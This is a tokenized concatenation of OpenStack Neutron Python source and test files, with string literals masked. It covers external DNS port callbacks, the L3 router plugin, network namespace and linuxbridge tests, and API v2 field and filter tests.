_send_data_to_external_dns_service ( context , dns_driver , <EOL> dns_data_db [ '<STR_LIT>' ] , <EOL> dns_data_db [ '<STR_LIT>' ] , <EOL> updated_ips ) <EOL> def _delete_port_in_external_dns_service ( resource , event , trigger , ** kwargs ) : <EOL> dns_driver = _get_dns_driver ( ) <EOL> if not dns_driver : <EOL> return <EOL> context = kwargs [ '<STR_LIT>' ] <EOL> port_id = kwargs [ '<STR_LIT>' ] <EOL> dns_data_db = context . session . query ( dns_db . PortDNS ) . filter_by ( <EOL> port_id = port_id ) . one_or_none ( ) <EOL> if not dns_data_db : <EOL> return <EOL> if dns_data_db [ '<STR_LIT>' ] : <EOL> ip_allocations = context . session . query ( <EOL> models_v2 . IPAllocation ) . filter_by ( port_id = port_id ) . all ( ) <EOL> records = [ alloc [ '<STR_LIT>' ] for alloc in ip_allocations ] <EOL> _remove_data_from_external_dns_service ( <EOL> context , dns_driver , dns_data_db [ '<STR_LIT>' ] , <EOL> dns_data_db [ '<STR_LIT>' ] , records ) <EOL> def subscribe ( ) : <EOL> registry . subscribe ( <EOL> _create_port_in_external_dns_service , resources . PORT , <EOL> events . AFTER_CREATE ) <EOL> registry . subscribe ( <EOL> _update_port_in_external_dns_service , resources . PORT , <EOL> events . AFTER_UPDATE ) <EOL> registry . subscribe ( <EOL> _delete_port_in_external_dns_service , resources . PORT , <EOL> events . BEFORE_DELETE ) <EOL> subscribe ( ) </s>
<s> from neutron_lib import constants as n_const <EOL> from oslo_config import cfg <EOL> from oslo_log import helpers as log_helpers <EOL> from oslo_utils import importutils <EOL> from neutron . api . rpc . agentnotifiers import l3_rpc_agent_api <EOL> from neutron . api . rpc . handlers import l3_rpc <EOL> from neutron . common import rpc as n_rpc <EOL> from neutron . common import topics <EOL> from neutron . db import common_db_mixin <EOL> from neutron . db import dns_db <EOL> from neutron . db import extraroute_db <EOL> from neutron . db import l3_db <EOL> from neutron . db import l3_dvr_ha_scheduler_db <EOL> from neutron . db import l3_dvrscheduler_db <EOL> from neutron . db import l3_gwmode_db <EOL> from neutron . db import l3_hamode_db <EOL> from neutron . plugins . common import constants <EOL> from neutron . quota import resource_registry <EOL> from neutron . services import service_base <EOL> class L3RouterPlugin ( service_base . ServicePluginBase , <EOL> common_db_mixin . CommonDbMixin , <EOL> extraroute_db . ExtraRoute_db_mixin , <EOL> l3_hamode_db . L3_HA_NAT_db_mixin , <EOL> l3_gwmode_db . L3_NAT_db_mixin , <EOL> l3_dvr_ha_scheduler_db . L3_DVR_HA_scheduler_db_mixin , <EOL> dns_db . DNSDbMixin ) : <EOL> """<STR_LIT>""" <EOL> supported_extension_aliases = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" ] <EOL> @ resource_registry . tracked_resources ( router = l3_db . Router , <EOL> floatingip = l3_db . FloatingIP ) <EOL> def __init__ ( self ) : <EOL> self . router_scheduler = importutils . import_object ( <EOL> cfg . CONF . router_scheduler_driver ) <EOL> self . start_periodic_l3_agent_status_check ( ) <EOL> super ( L3RouterPlugin , self ) . __init__ ( ) <EOL> if '<STR_LIT>' in self . supported_extension_aliases : <EOL> l3_dvrscheduler_db . subscribe ( ) <EOL> l3_db . subscribe ( ) <EOL> self . start_rpc_listeners ( ) <EOL> @ log_helpers . log_method_call <EOL> def start_rpc_listeners ( self ) : <EOL> self . topic = topics . L3PLUGIN <EOL> self . conn = n_rpc . create_connection ( ) <EOL> self . agent_notifiers . update ( <EOL> { n_const . AGENT_TYPE_L3 : l3_rpc_agent_api . L3AgentNotifyAPI ( ) } ) <EOL> self . endpoints = [ l3_rpc . L3RpcCallback ( ) ] <EOL> self . conn . create_consumer ( self . topic , self . endpoints , <EOL> fanout = False ) <EOL> return self . conn . consume_in_threads ( ) <EOL> def get_plugin_type ( self ) : <EOL> return constants . L3_ROUTER_NAT <EOL> def get_plugin_description ( self ) : <EOL> """<STR_LIT>""" <EOL> return ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def create_floatingip ( self , context , floatingip ) : <EOL> """<STR_LIT>""" <EOL> return super ( L3RouterPlugin , self ) . create_floatingip ( <EOL> context , floatingip , <EOL> initial_status = n_const . FLOATINGIP_STATUS_DOWN ) </s>
<s> import functools <EOL> import random <EOL> import netaddr <EOL> from neutron . tests . common . exclusive_resources import resource_allocator <EOL> def get_random_ip ( low , high ) : <EOL> parent_range = netaddr . IPRange ( low , high ) <EOL> return str ( random . choice ( parent_range ) ) <EOL> class ExclusiveIPAddress ( resource_allocator . ExclusiveResource ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , low , high ) : <EOL> super ( ExclusiveIPAddress , self ) . __init__ ( <EOL> '<STR_LIT>' , functools . partial ( get_random_ip , low , high ) ) <EOL> def _setUp ( self ) : <EOL> super ( ExclusiveIPAddress , self ) . _setUp ( ) <EOL> self . address = netaddr . IPAddress ( self . resource ) </s>
<s> import mock <EOL> from oslo_utils import uuidutils <EOL> from neutron . agent . l3 import dvr_snat_ns <EOL> from neutron . agent . l3 import namespace_manager <EOL> from neutron . agent . l3 import namespaces <EOL> from neutron . agent . linux import ip_lib <EOL> from neutron . tests . functional import base <EOL> _uuid = uuidutils . generate_uuid <EOL> class NamespaceManagerTestFramework ( base . BaseSudoTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( NamespaceManagerTestFramework , self ) . setUp ( ) <EOL> self . agent_conf = mock . MagicMock ( ) <EOL> self . metadata_driver_mock = mock . Mock ( ) <EOL> self . namespace_manager = namespace_manager . NamespaceManager ( <EOL> self . agent_conf , driver = None , <EOL> metadata_driver = self . metadata_driver_mock ) <EOL> def _create_namespace ( self , router_id , ns_class ) : <EOL> namespace = ns_class ( router_id , self . agent_conf , driver = None , <EOL> use_ipv6 = False ) <EOL> namespace . create ( ) <EOL> self . addCleanup ( self . _delete_namespace , namespace ) <EOL> return namespace . name <EOL> def _delete_namespace ( self , namespace ) : <EOL> try : <EOL> namespace . delete ( ) <EOL> except RuntimeError as e : <EOL> if '<STR_LIT>' not in str ( e ) : <EOL> raise e <EOL> def _namespace_exists ( self , namespace ) : <EOL> ip = ip_lib . IPWrapper ( namespace = namespace ) <EOL> return ip . netns . exists ( namespace ) <EOL> class NamespaceManagerTestCase ( NamespaceManagerTestFramework ) : <EOL> def test_namespace_manager ( self ) : <EOL> router_id = _uuid ( ) <EOL> router_id_to_delete = _uuid ( ) <EOL> to_keep = set ( ) <EOL> to_delete = set ( ) <EOL> to_retrieve = set ( ) <EOL> to_keep . add ( self . _create_namespace ( router_id , <EOL> namespaces . RouterNamespace ) ) <EOL> to_keep . add ( self . _create_namespace ( router_id , <EOL> dvr_snat_ns . SnatNamespace ) ) <EOL> to_delete . add ( self . _create_namespace ( router_id_to_delete , <EOL> dvr_snat_ns . SnatNamespace ) ) <EOL> to_retrieve = to_keep | to_delete <EOL> with mock . patch . object ( namespace_manager . NamespaceManager , '<STR_LIT>' , <EOL> return_value = to_retrieve ) : <EOL> with self . namespace_manager as ns_manager : <EOL> for ns_name in to_keep : <EOL> id_to_keep = ns_manager . get_prefix_and_id ( ns_name ) [ <NUM_LIT:1> ] <EOL> ns_manager . keep_router ( id_to_keep ) <EOL> for ns_name in to_keep : <EOL> self . assertTrue ( self . _namespace_exists ( ns_name ) ) <EOL> for ns_name in to_delete : <EOL> ( self . metadata_driver_mock . destroy_monitored_metadata_proxy . <EOL> assert_called_once_with ( mock . ANY , <EOL> router_id_to_delete , <EOL> self . agent_conf ) ) <EOL> self . assertFalse ( self . _namespace_exists ( ns_name ) ) </s>
<s> import fixtures <EOL> import mock <EOL> from neutron_lib import constants <EOL> from neutron . agent . linux import ip_lib <EOL> from neutron . plugins . ml2 . drivers . linuxbridge . agent import linuxbridge_neutron_agent as lb_agent <EOL> from neutron . tests . common import config_fixtures <EOL> from neutron . tests . common import net_helpers <EOL> from neutron . tests . functional import base <EOL> from neutron . tests import tools <EOL> class LinuxbridgeCleanupTest ( base . BaseSudoTestCase ) : <EOL> def _test_linuxbridge_cleanup ( self , bridge_exists , callback ) : <EOL> br_fixture = self . useFixture ( <EOL> tools . SafeCleanupFixture ( <EOL> net_helpers . LinuxBridgeFixture ( <EOL> prefix = lb_agent . BRIDGE_NAME_PREFIX ) ) ) . fixture <EOL> config = callback ( br_fixture ) <EOL> config . update ( { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:False>' } } ) <EOL> temp_dir = self . useFixture ( fixtures . TempDir ( ) ) . path <EOL> conf = self . useFixture ( config_fixtures . ConfigFileFixture ( <EOL> base_filename = '<STR_LIT>' , <EOL> config = config , <EOL> temp_dir = temp_dir ) ) <EOL> cmd = '<STR_LIT>' , '<STR_LIT>' , conf . filename <EOL> ip_wrapper = ip_lib . IPWrapper ( br_fixture . namespace ) <EOL> ip_wrapper . netns . execute ( cmd ) <EOL> self . assertEqual ( bridge_exists , ip_lib . device_exists ( <EOL> br_fixture . bridge . name , br_fixture . namespace ) ) <EOL> def test_cleanup_empty_bridge ( self ) : <EOL> def callback ( br_fixture ) : <EOL> return config_fixtures . ConfigDict ( ) <EOL> self . _test_linuxbridge_cleanup ( False , callback ) <EOL> def test_no_cleanup_bridge_with_tap ( self ) : <EOL> def callback ( br_fixture ) : <EOL> mock . patch . object ( <EOL> net_helpers , '<STR_LIT>' , <EOL> new_callable = mock . PropertyMock ( <EOL> return_value = constants . TAP_DEVICE_PREFIX + '<STR_LIT:0>' ) ) . start ( ) <EOL> mock . patch . object ( <EOL> net_helpers , '<STR_LIT>' , <EOL> new_callable = mock . PropertyMock ( <EOL> return_value = constants . TAP_DEVICE_PREFIX + '<STR_LIT:1>' ) ) . start ( ) <EOL> self . useFixture ( <EOL> tools . SafeCleanupFixture ( <EOL> net_helpers . LinuxBridgePortFixture ( <EOL> br_fixture . bridge , br_fixture . namespace ) ) ) <EOL> return config_fixtures . ConfigDict ( ) <EOL> self . _test_linuxbridge_cleanup ( True , callback ) <EOL> def test_no_cleanup_bridge_in_bridge_mappings ( self ) : <EOL> def callback ( br_fixture ) : <EOL> br_name = br_fixture . bridge . name <EOL> conf = config_fixtures . ConfigDict ( ) <EOL> conf . update ( <EOL> { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' % br_name } } ) <EOL> return conf <EOL> self . _test_linuxbridge_cleanup ( True , callback ) </s>
<s> """<STR_LIT>""" <EOL> from tempest . lib import exceptions as tlib_exceptions <EOL> from neutron . tests import base <EOL> from neutron . tests . retargetable import client_fixtures <EOL> from tempest import test as t_test <EOL> class RestClientFixture ( client_fixtures . AbstractClientFixture ) : <EOL> """<STR_LIT>""" <EOL> @ property <EOL> def client ( self ) : <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> manager = t_test . BaseTestCase . get_client_manager ( ) <EOL> self . _client = manager . network_client <EOL> return self . _client <EOL> @ property <EOL> def NotFound ( self ) : <EOL> return tlib_exceptions . NotFound <EOL> def _cleanup_network ( self , id_ ) : <EOL> try : <EOL> self . delete_network ( id_ ) <EOL> except self . NotFound : <EOL> pass <EOL> def create_network ( self , ** kwargs ) : <EOL> network = self . _create_network ( ** kwargs ) <EOL> self . addCleanup ( self . _cleanup_network , network . id ) <EOL> return network <EOL> def _create_network ( self , ** kwargs ) : <EOL> body = self . client . create_network ( ** kwargs ) <EOL> return base . AttributeDict ( body [ '<STR_LIT>' ] ) <EOL> def update_network ( self , id_ , ** kwargs ) : <EOL> body = self . client . update_network ( id_ , ** kwargs ) <EOL> return base . AttributeDict ( body [ '<STR_LIT>' ] ) <EOL> def get_network ( self , id_ , ** kwargs ) : <EOL> body = self . client . show_network ( id_ , ** kwargs ) <EOL> return base . AttributeDict ( body [ '<STR_LIT>' ] ) <EOL> def get_networks ( self , ** kwargs ) : <EOL> body = self . client . list_networks ( ** kwargs ) <EOL> return [ base . AttributeDict ( x ) for x in body [ '<STR_LIT>' ] ] <EOL> def delete_network ( self , id_ ) : <EOL> self . client . delete_network ( id_ ) </s>
<s> from tempest import test <EOL> from neutron . tests . tempest . api import base <EOL> class PortsTestJSON ( base . BaseNetworkTest ) : <EOL> @ classmethod <EOL> def resource_setup ( cls ) : <EOL> super ( PortsTestJSON , cls ) . resource_setup ( ) <EOL> cls . network = cls . create_network ( ) <EOL> @ test . idempotent_id ( '<STR_LIT>' ) <EOL> @ test . requires_ext ( extension = "<STR_LIT>" , <EOL> service = "<STR_LIT>" ) <EOL> def test_create_update_port_description ( self ) : <EOL> body = self . create_port ( self . network , <EOL> description = '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT>' , body [ '<STR_LIT:description>' ] ) <EOL> body = self . client . list_ports ( id = body [ '<STR_LIT:id>' ] ) [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> self . assertEqual ( '<STR_LIT>' , body [ '<STR_LIT:description>' ] ) <EOL> body = self . client . update_port ( body [ '<STR_LIT:id>' ] , <EOL> description = '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT>' , body [ '<STR_LIT:port>' ] [ '<STR_LIT:description>' ] ) <EOL> body = self . client . list_ports ( id = body [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] ) [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> self . assertEqual ( '<STR_LIT>' , body [ '<STR_LIT:description>' ] ) </s>
<s> import mock <EOL> from oslo_utils import uuidutils <EOL> from neutron . agent . l3 import ha_router <EOL> from neutron . tests import base <EOL> _uuid = uuidutils . generate_uuid <EOL> class TestBasicRouterOperations ( base . BaseTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestBasicRouterOperations , self ) . setUp ( ) <EOL> def _create_router ( self , router = None , ** kwargs ) : <EOL> if not router : <EOL> router = mock . MagicMock ( ) <EOL> self . agent_conf = mock . Mock ( ) <EOL> self . router_id = _uuid ( ) <EOL> return ha_router . HaRouter ( mock . sentinel . enqueue_state , <EOL> self . router_id , <EOL> router , <EOL> self . agent_conf , <EOL> mock . sentinel . driver , <EOL> ** kwargs ) <EOL> def test_get_router_cidrs_returns_ha_cidrs ( self ) : <EOL> ri = self . _create_router ( ) <EOL> device = mock . MagicMock ( ) <EOL> device . name . return_value = '<STR_LIT>' <EOL> addresses = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ri . _get_cidrs_from_keepalived = mock . MagicMock ( return_value = addresses ) <EOL> self . assertEqual ( set ( addresses ) , ri . get_router_cidrs ( device ) ) <EOL> def test__add_default_gw_virtual_route ( self ) : <EOL> ri = self . _create_router ( ) <EOL> mock_instance = mock . Mock ( ) <EOL> mock_instance . virtual_routes . gateway_routes = [ ] <EOL> ri . _get_keepalived_instance = mock . Mock ( return_value = mock_instance ) <EOL> subnets = [ { '<STR_LIT:id>' : _uuid ( ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None } ] <EOL> ex_gw_port = { '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : subnets , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT:id>' : _uuid ( ) , <EOL> '<STR_LIT>' : _uuid ( ) , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> ri . _add_default_gw_virtual_route ( ex_gw_port , '<STR_LIT>' ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( mock_instance . virtual_routes . gateway_routes ) ) <EOL> subnets . append ( { '<STR_LIT:id>' : _uuid ( ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> ri . _add_default_gw_virtual_route ( ex_gw_port , '<STR_LIT>' ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( mock_instance . virtual_routes . gateway_routes ) ) </s>
<s> import mock <EOL> from neutron . agent . common import base_polling <EOL> from neutron . agent . linux import polling <EOL> from neutron . tests import base <EOL> class TestGetPollingManager ( base . BaseTestCase ) : <EOL> def test_return_always_poll_by_default ( self ) : <EOL> with polling . get_polling_manager ( ) as pm : <EOL> self . assertEqual ( pm . __class__ , base_polling . AlwaysPoll ) <EOL> def test_manage_polling_minimizer ( self ) : <EOL> mock_target = '<STR_LIT>' <EOL> with mock . patch ( '<STR_LIT>' % mock_target ) as mock_start : <EOL> with mock . patch ( '<STR_LIT>' % mock_target ) as mock_stop : <EOL> with polling . get_polling_manager ( minimize_polling = True ) as pm : <EOL> self . assertEqual ( pm . __class__ , <EOL> polling . InterfacePollingMinimizer ) <EOL> mock_stop . assert_has_calls ( [ mock . call ( ) ] ) <EOL> mock_start . assert_has_calls ( [ mock . call ( ) ] ) <EOL> class TestInterfacePollingMinimizer ( base . BaseTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestInterfacePollingMinimizer , self ) . setUp ( ) <EOL> self . pm = polling . InterfacePollingMinimizer ( ) <EOL> def test_start_calls_monitor_start ( self ) : <EOL> with mock . patch . object ( self . pm . _monitor , '<STR_LIT:start>' ) as mock_start : <EOL> self . pm . start ( ) <EOL> mock_start . assert_called_with ( ) <EOL> def test_stop_calls_monitor_stop ( self ) : <EOL> with mock . patch . object ( self . pm . _monitor , '<STR_LIT>' ) as mock_stop : <EOL> self . pm . stop ( ) <EOL> mock_stop . assert_called_with ( ) <EOL> def mock_has_updates ( self , return_value ) : <EOL> target = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return mock . patch ( <EOL> target , <EOL> new_callable = mock . PropertyMock ( return_value = return_value ) , <EOL> ) <EOL> def test__is_polling_required_returns_when_updates_are_present ( self ) : <EOL> with self . mock_has_updates ( True ) : <EOL> self . assertTrue ( self . pm . _is_polling_required ( ) ) </s>
<s> import os <EOL> import mock <EOL> from neutron_lib . api import converters <EOL> from neutron_lib import constants <EOL> from neutron_lib import exceptions as n_exc <EOL> from oslo_config import cfg <EOL> from oslo_db import exception as db_exc <EOL> from oslo_policy import policy as oslo_policy <EOL> from oslo_utils import uuidutils <EOL> import six <EOL> from six import moves <EOL> import six . moves . urllib . parse as urlparse <EOL> import webob <EOL> from webob import exc <EOL> import webtest <EOL> from neutron . api import api_common <EOL> from neutron . api import extensions <EOL> from neutron . api . rpc . agentnotifiers import dhcp_rpc_agent_api <EOL> from neutron . api . v2 import attributes <EOL> from neutron . api . v2 import base as v2_base <EOL> from neutron . api . v2 import router <EOL> from neutron import context <EOL> from neutron import manager <EOL> from neutron import policy <EOL> from neutron import quota <EOL> from neutron . quota import resource_registry <EOL> from neutron . tests import base <EOL> from neutron . tests import fake_notifier <EOL> from neutron . tests import tools <EOL> from neutron . tests . unit import testlib_api <EOL> EXTDIR = os . path . join ( base . ROOTDIR , '<STR_LIT>' ) <EOL> _uuid = uuidutils . generate_uuid <EOL> def _get_path ( resource , id = None , action = None , fmt = None ) : <EOL> path = '<STR_LIT>' % resource <EOL> if id is not None : <EOL> path = path + '<STR_LIT>' % id <EOL> if action is not None : <EOL> path = path + '<STR_LIT>' % action <EOL> if fmt is not None : <EOL> path = path + '<STR_LIT>' % fmt <EOL> return path <EOL> class ResourceIndexTestCase ( base . BaseTestCase ) : <EOL> def test_index_json ( self ) : <EOL> index = webtest . TestApp ( router . Index ( { '<STR_LIT:foo>' : '<STR_LIT:bar>' } ) ) <EOL> res = index . get ( '<STR_LIT>' ) <EOL> self . assertIn ( '<STR_LIT>' , res . json ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( res . json [ '<STR_LIT>' ] ) ) <EOL> resource = res . json [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> self . assertIn ( '<STR_LIT>' , resource ) <EOL> self . assertEqual ( '<STR_LIT:bar>' , resource [ '<STR_LIT>' ] ) <EOL> self . assertIn ( '<STR_LIT:name>' , resource ) <EOL> self . assertEqual ( '<STR_LIT:foo>' , resource [ '<STR_LIT:name>' ] ) <EOL> self . assertIn ( '<STR_LIT>' , resource ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( resource [ '<STR_LIT>' ] ) ) <EOL> link = resource [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> self . assertIn ( '<STR_LIT>' , link ) <EOL> self . assertEqual ( link [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertIn ( '<STR_LIT>' , link ) <EOL> self . assertEqual ( '<STR_LIT>' , link [ '<STR_LIT>' ] ) <EOL> class APIv2TestBase ( base . BaseTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( APIv2TestBase , self ) . setUp ( ) <EOL> plugin = '<STR_LIT>' <EOL> extensions . PluginAwareExtensionManager . _instance = None <EOL> self . config_parse ( ) <EOL> self . setup_coreplugin ( plugin ) <EOL> cfg . CONF . set_override ( '<STR_LIT>' , True ) <EOL> cfg . CONF . set_override ( '<STR_LIT>' , True ) <EOL> self . _plugin_patcher = mock . patch ( plugin , autospec = True ) <EOL> self . plugin = self . _plugin_patcher . start ( ) <EOL> instance = self . plugin . return_value <EOL> instance . _NeutronPluginBaseV2__native_pagination_support = True <EOL> instance . _NeutronPluginBaseV2__native_sorting_support = True <EOL> api = router . APIRouter ( ) <EOL> self . api = webtest . TestApp ( api ) <EOL> quota . QUOTAS . _driver = None <EOL> cfg . CONF . set_override ( '<STR_LIT>' , '<STR_LIT>' , <EOL> group = '<STR_LIT>' ) <EOL> policy . init ( ) <EOL> class _ArgMatcher ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , cmp , obj ) : <EOL> self . cmp = cmp <EOL> self . obj = obj <EOL> def __eq__ ( self , other ) : <EOL> return self . cmp ( self . obj , other ) <EOL> def _list_cmp ( l1 , l2 ) : <EOL> return set ( l1 ) == set ( l2 ) <EOL> class APIv2TestCase ( APIv2TestBase ) : <EOL> def _do_field_list ( self , resource , base_fields ) : <EOL> attr_info = attributes . RESOURCE_ATTRIBUTE_MAP [ resource ] <EOL> policy_attrs = [ name for ( name , info ) in attr_info . items ( ) <EOL> if info . get ( '<STR_LIT>' ) ] <EOL> for name , info in attr_info . items ( ) : <EOL> if info . get ( '<STR_LIT:primary_key>' ) : <EOL> policy_attrs . append ( name ) <EOL> fields = base_fields <EOL> fields . extend ( policy_attrs ) <EOL> return fields <EOL> def _get_collection_kwargs ( self , skipargs = None , ** kwargs ) : <EOL> skipargs = skipargs or [ ] <EOL> args_list = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> args_dict = dict ( <EOL> ( arg , mock . ANY ) for arg in set ( args_list ) - set ( skipargs ) ) <EOL> args_dict . update ( kwargs ) <EOL> return args_dict <EOL> def test_fields ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) , { '<STR_LIT>' : '<STR_LIT:foo>' } ) <EOL> fields = self . _do_field_list ( '<STR_LIT>' , [ '<STR_LIT:foo>' ] ) <EOL> kwargs = self . _get_collection_kwargs ( fields = fields ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_fields_multiple ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> fields = self . _do_field_list ( '<STR_LIT>' , [ '<STR_LIT:foo>' , '<STR_LIT:bar>' ] ) <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) , { '<STR_LIT>' : [ '<STR_LIT:foo>' , '<STR_LIT:bar>' ] } ) <EOL> kwargs = self . _get_collection_kwargs ( fields = fields ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_fields_multiple_with_empty ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> fields = self . _do_field_list ( '<STR_LIT>' , [ '<STR_LIT:foo>' ] ) <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) , { '<STR_LIT>' : [ '<STR_LIT:foo>' , '<STR_LIT>' ] } ) <EOL> kwargs = self . _get_collection_kwargs ( fields = fields ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_fields_empty ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) , { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> kwargs = self . _get_collection_kwargs ( fields = [ ] ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_fields_multiple_empty ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) , { '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] } ) <EOL> kwargs = self . _get_collection_kwargs ( fields = [ ] ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_filters ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) , { '<STR_LIT:name>' : '<STR_LIT:bar>' } ) <EOL> filters = { '<STR_LIT:name>' : [ '<STR_LIT:bar>' ] } <EOL> kwargs = self . _get_collection_kwargs ( filters = filters ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_filters_empty ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) , { '<STR_LIT:name>' : '<STR_LIT>' } ) <EOL> filters = { } <EOL> kwargs = self . _get_collection_kwargs ( filters = filters ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_filters_multiple_empty ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) , { '<STR_LIT:name>' : [ '<STR_LIT>' , '<STR_LIT>' ] } ) <EOL> filters = { } <EOL> kwargs = self . _get_collection_kwargs ( filters = filters ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_filters_multiple_with_empty ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) , { '<STR_LIT:name>' : [ '<STR_LIT:bar>' , '<STR_LIT>' ] } ) <EOL> filters = { '<STR_LIT:name>' : [ '<STR_LIT:bar>' ] } <EOL> kwargs = self . _get_collection_kwargs ( filters = filters ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_filters_multiple_values ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) , { '<STR_LIT:name>' : [ '<STR_LIT:bar>' , '<STR_LIT>' ] } ) <EOL> filters = { '<STR_LIT:name>' : [ '<STR_LIT:bar>' , '<STR_LIT>' ] } <EOL> kwargs = self . _get_collection_kwargs ( filters = filters ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_filters_multiple ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) , { '<STR_LIT:name>' : '<STR_LIT:bar>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> filters = { '<STR_LIT:name>' : [ '<STR_LIT:bar>' ] , '<STR_LIT>' : [ '<STR_LIT>' ] } <EOL> kwargs = self . _get_collection_kwargs ( filters = filters ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_filters_with_fields ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) , { '<STR_LIT:name>' : '<STR_LIT:bar>' , '<STR_LIT>' : '<STR_LIT:foo>' } ) <EOL> filters = { '<STR_LIT:name>' : [ '<STR_LIT:bar>' ] } <EOL> fields = self . _do_field_list ( '<STR_LIT>' , [ '<STR_LIT:foo>' ] ) <EOL> kwargs = self . _get_collection_kwargs ( filters = filters , fields = fields ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_filters_with_convert_to ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_ports . return_value = [ ] <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) , { '<STR_LIT>' : '<STR_LIT:true>' } ) <EOL> filters = { '<STR_LIT>' : [ True ] } <EOL> kwargs = self . _get_collection_kwargs ( filters = filters ) <EOL> instance . get_ports . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_filters_with_convert_list_to ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_ports . return_value = [ ] <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) , <EOL> { '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] } ) <EOL> filters = { '<STR_LIT>' : { '<STR_LIT>' : [ '<STR_LIT:foo>' ] , '<STR_LIT>' : [ '<STR_LIT:bar>' ] } } <EOL> kwargs = self . _get_collection_kwargs ( filters = filters ) <EOL> instance . get_ports . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def test_limit ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = [ ] <EOL> self . api . get ( _get_path ( '<STR_LIT>' ) , <EOL> { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> kwargs = self . _get_collection_kwargs ( limit = <NUM_LIT:10> ) <EOL> instance . get_networks . assert_called_once_with ( mock . ANY , ** kwargs ) <EOL> def 